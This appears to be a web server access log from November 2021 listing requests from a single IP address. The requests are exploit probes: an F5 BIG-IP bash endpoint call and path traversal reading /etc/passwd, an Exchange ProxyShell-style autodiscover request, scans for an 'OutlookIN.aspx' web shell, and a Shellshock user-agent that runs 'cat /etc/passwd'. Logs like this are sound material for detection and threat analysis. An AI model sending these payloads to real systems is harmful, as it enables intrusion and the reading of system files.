timestamp | ip | host | browser | uri |
---|
20211115-02:42:49 | 45.146.164.160 | 45.146.164.160 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0 | /mgmt/tm/util/bash |
20211115-16:27:42 | 45.146.164.160 | 45.146.164.160 | Go-http-client/1.1 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd |
20211115-19:14:39 | 45.146.164.160 | 45.146.164.160 | Go-http-client/1.1 | /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp |
20211123-16:54:41 | 45.146.164.160 | 45.146.164.160 | Go-http-client/1.1 | /aspnet_client/system_web/4_0_30319/OutlookIN.aspx |
20211123-16:54:41 | 45.146.164.160 | 45.146.164.160 | Go-http-client/1.1 | /owa/auth/system_web/4_0_30319/OutlookIN.aspx |
20211123-16:54:42 | 45.146.164.160 | 45.146.164.160 | Go-http-client/1.1 | /owa/auth/Current/system_web/4_0_30319/OutlookIN.aspx |
20211123-16:54:43 | 45.146.164.160 | 45.146.164.160 | Go-http-client/1.1 | /owa/auth/Current/scripts/system_web/4_0_30319/OutlookIN.aspx |
20211123-16:54:44 | 45.146.164.160 | 45.146.164.160 | Go-http-client/1.1 | /owa/auth/Current/scripts/premium/system_web/4_0_30319/OutlookIN.aspx |
20211123-16:54:44 | 45.146.164.160 | 45.146.164.160 | Go-http-client/1.1 | /owa/auth/Current/themes/system_web/4_0_30319/OutlookIN.aspx |
20211123-16:54:45 | 45.146.164.160 | 45.146.164.160 | Go-http-client/1.1 | /owa/auth/Current/themes/resources/system_web/4_0_30319/OutlookIN.aspx |
20211129-15:34:45 | 45.146.164.160 | 45.146.164.160 | () { :; }; echo ; /bin/bash -c 'cat /etc/passwd' | /cgi-bin/jarrewrite.sh |